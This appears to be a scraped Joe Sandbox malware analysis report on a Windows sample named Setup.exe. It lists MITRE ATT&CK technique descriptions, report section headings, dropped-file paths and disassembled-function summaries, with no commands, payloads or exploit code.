Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Setup.exe_All My_5fbe40f63b64d584b938a1eb405139b9fd77314b_7774cee5_32dc2cbd-968f-4915-9216-e533bd805671\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Setup.exe_All My_a8c2553b49bfdb288d2c0942c3208ff4d1873e_7774cee5_83f8a73e-cba2-40af-b7fb-5b0baef4ce40\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3656.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37AF.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37DF.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD1D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE08.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE57.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199680660089[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\f1575b64-8492-4e8b-b102-4d26e8c70371[1].txt

C:\Windows\appcompat\Programs\Amcache.hve

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Windows Analysis Report
Setup.exe

Function 031D5280 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 181
memoryfilenativeCOMMON

Function 031CA5A0 Relevance: 9.7, APIs: 2, Strings: 3, Instructions: 924
sleepCOMMON

Function 031ABA40 Relevance: 9.4, APIs: 6, Instructions: 369
memorystringencryptionCOMMON

Function 031A9C20 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 335
processCOMMON

Function 031AA250 Relevance: 7.6, APIs: 5, Instructions: 141
memoryCOMMON

Function 031B2080 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 605
fileCOMMON

Function 02D50A77 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Function 02D50367 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 399
threadCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre